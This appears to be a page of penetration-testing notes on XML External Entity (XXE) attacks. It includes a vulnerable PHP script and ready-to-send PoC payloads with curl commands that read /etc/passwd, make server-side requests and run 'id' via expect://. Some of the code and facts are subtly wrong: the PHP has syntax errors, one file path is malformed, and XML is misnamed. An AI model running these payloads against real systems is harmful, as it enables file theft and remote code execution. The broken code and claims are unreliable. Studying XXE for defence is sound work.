XXE

What is it?

XML External Entities (XXE) is used to attack systems that parse XML input via file upload or other ways. The modified XML file would abuse SYSTEM entity and can be used to attack a Web application. Attacks include denial of service, local file disclosure, remote code execution, and more.

Extensive Markup Language (XML) is a language designed for desktop publishing, and now widely ued for data exchange. It is a markup language similar to HTML and derived from SGML which was based on IBM's GML back from 1960s. XML is typically used instead of HTML when data must be sent from one application to another (Data Interchange)

Exploitation

XXE flaws allow injection attacks. XML by default supports "external entities". Abuse of XXE flaw allows malicious profile to turn XML parser into a proxy, potentially serving local and remote content. (External entities vuln are similar to LFI/RFI). This can lead to RCE.

Types of XXE attacks

XXE Attack Type

Description

Exploiting XXE to Retrieve Files

Where an external entity is defined containing the contents of a file, and returned in the application's response.

Exploiting XXE to Perform SSRF Attacks

Where an external entity is defined based on a URL to a back-end system.

Exploiting Blind XXE Exfiltrate Data Out-of-Band

Where sensitive data is transmitted from the application server to a system that the attacker controls.

Exploiting blind XXE to Retrieve Data Via Error Messages

Where the attacker can trigger a parsing error message containing sensitive data.

SSRF via XXE

SSRF is related to CSRF. CSRF: Forged request originating from a client. SSRF: Forged request originating from a server

Example PoC

Having access to server side scripts. Below is the vulnerable server side php script that is working on /book.php site, which if you look at HTML source you will not find the code.

<?php
$xmlfile = file_get contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
$xml = simplexml_import_dom($dom);
$author = $xml->author;
$title = $xml->title;
$date = $xml->publish_date;

echo "Thank you for you file submission!<br>";
echo "Your entry: <br>";
echo "Author: " . $author . <br>";
echo "Title: " . $title . <br>";
echo "Date: " . $date . <br>";
?>

Because above php page, has XML entry for author, title, and publish_date.

PoC 1- Testing payload (xxe.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "TEST" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

# Upload file via file upload on siteor Curl to send payload
curl -d@/home/test/xxe.xml http://test.com/book.php
# On browser route to http:

PoC 2 (LFI) - Display Local File (xxe2.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file://etc/passwd" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe2.xml http://test.com/book.php

PoC 3 (RFI) - Access URL (xxe3.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "http://google.com/robots.txt" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe3.xml http://test.com/book.php

PoC 4 (RCE) - Remote Code Execution via php (xxe4.xml)

<?xml version="1.0"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<entry>
    <author>&xxe;</author>
    <title>Title</title>
    <publish_date>1990</publish_date>
</entry>

#Upload file via file upload on site or curl to send payload
curl -d@/home/test/xxe4.xml http://test.com/book.php

Sample payload

<?xml version="1.0" encoding="ISO-8859-1"?>
    <!DOCTYPE foo [  
    <!ELEMENT foo (#ANY)>
    <!ENTITY xxe SYSTEM "file:///etc/passwd">]>

Payloads

Good Resource for payloads: https://github.com/payloadbox/xxe-injection-payload-list

Cheat sheet

OWASP XML Prevention Cheat Sheet: https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html

Other Resources

OWASP's XML External Entity (XXE) Processing: https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing

Blind XXE: https://portswigger.net/web-security/xxe/blind

Exploiting XXE with local DTD files: https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

From blind XXE to root-level file read acces: https://honoki.net/2018/12/12/from-blind-xxe-to-root-level-file-read-access/

References

PreviousXSSNextCSRF

Last updated